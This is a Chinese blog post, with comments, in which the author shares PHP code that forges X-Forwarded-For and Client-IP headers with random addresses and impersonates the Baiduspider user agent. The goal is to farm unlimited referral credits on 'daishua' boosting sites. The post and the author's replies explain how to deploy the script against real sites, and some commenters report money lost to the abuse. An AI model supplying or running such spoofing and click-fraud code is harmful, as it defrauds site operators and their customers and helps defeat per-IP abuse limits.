POST

【原创】PHP模拟百度蜘蛛,伪造IP爬行网站,附源代码

请注意,本文编写于 310 天前,最后修改于 166 天前,其中某些信息可能已经过时。

最近各位应该知道那些代刷网的漏洞吧,就是推广漏洞,无限撸的漏洞,别的地方我不知道,反正我的群(群号:545688344)撸爆了。作俑者就是我,给各位站长说抱歉了,下面放出我的思路和代码。

开始我就猜想模拟X-FORWARDED-FOR和CLIENT-IP可不可以实现他这个一个IP点击一次算推广一次的方法,事实证明是可以的,但是基本所有的代刷网都有个特点 用 curl 或者 get_contents 这两个函数都不能访问,个人猜想应该是有屏蔽(PS:我没看过代刷网的源码),但是我看到似乎很多代刷网百度都有收录,就想模拟百度蜘蛛应该可以吧,于是就用模拟了百度的USER_AGENT,运行结果可行,下面贴代码:

<?php
// 关闭PHP报错
error_reporting( E_ALL^E_NOTICE^E_WARNING );

//实现使用curl模拟百度蜘蛛进行采集
function Go( $url )
{
    $ch = curl_init();
    //随机生成IP
    $ip = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255) ; // 百度蜘蛛
    $timeout = 15;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_TIMEOUT,0);
    //伪造百度蜘蛛IP  
    curl_setopt($ch,CURLOPT_HTTPHEADER,array('X-FORWARDED-FOR:'.$ip.'','CLIENT-IP:'.$ip.'')); 
    //伪造百度蜘蛛头部
    curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_HEADER,0);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
      curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    $content = curl_exec($ch);
}

//判断url是否存在  存在进行访问
if ($_GET['url']) {
    $api = $_GET['url'];
    $data = Go($api);
    sleep(10);
    $mydata = ['msg'=>200,'val'=>'提交成功','num'=>1];
    exit(json_encode($mydata, JSON_UNESCAPED_UNICODE));
}else{
    $mydata = ['msg'=>404,'val'=>'提交失败','cause'=>'URL推广链接不能为空'];
    exit(json_encode($mydata, JSON_UNESCAPED_UNICODE));
}

给各位站长的建议:推广插件尽量还是别用,如果要用还是加验证码,验证码比较容易识别的就算了,你们现在那种验证码我已经写好识别了,但是考虑到问题决定暂时不发,请各位站长及时修复!

原创文章 未经许可 禁止搬运!

← 上一篇 下一篇 →
Comments

添加新评论

已有 27 条评论

睡觉睡觉 2018-05-25

推广链接填在哪

Reaper 2018-05-27
@睡觉睡觉

评论下面有 你找找评论

范特西 2018-05-16

就是不知道网址输在哪里,怎么使用,以前很少用php,是用油猴吗?⌇●﹏●⌇谢谢

Reaper 2018-05-17
@范特西

域名/PHP文件?url=你的推广链接

Reaper 2018-05-17
@范特西

现在彩虹写了新版 应该不能用了 这是很老的版本了 不过你可以试试

范特西 2018-05-12

能给一个范例网址吗?一直没弄懂【尴尬】

Reaper 2018-05-13
@范特西

那里不懂

但是联发科 2018-05-05

{"msg":404,"val":"提交失败","cause":"URL推广链接不能为空"}提示这个

但是联发科 2018-05-05

get传值在哪

但是联发科 2018-05-05

url在哪填写

Reaper 2018-05-05
@但是联发科

GET传值

橘子 2018-04-28

搞完了是不是点一次等于一次推广?那我点无数次不就有无数个了吗?

Reaper 2018-04-28
@橘子

是的 理论是这样 但是如果他有限制或者这有验证码就不能绕过!

橘子 2018-04-28

搞好了点一次就等于是推广一个了?意思是不是我点无数次就有无数次个赞?

2812963415 2018-04-14

提示的这个 {"msg":200,"val":null,"num":1}

Reaper 2018-04-14
@2812963415

我加你qq看看

2812963415 2018-04-14

哦哦 原来如此

2812963415 2018-04-14

这玩意怎么用...

Reaper 2018-04-14
@2812963415

创建一个PHP文件 把代码复制到到里面 然后上传运行就行了 格式 你的 域名/PHP文件?url=你的推广链接

小星 2018-04-13

难怪我发现我充了一百块钱,现在只有毛线。

Reaper 2018-04-13
@小星

别秀了 表弟

强某人 2018-04-13

这个封装类岂不是鸡肋?

Reaper 2018-04-13
@强某人

我其他也用这个类 但是放出来直接合成一个文件好点 其他的代码你懂的

苏安 2018-04-13

666(ฅ´ω`ฅ)

Reaper 2018-04-13
@苏安

6666

让你皮 2018-04-13

我操你吗?我特么充了几次钱。原来是你

Reaper 2018-04-13
@让你皮

大佬我错了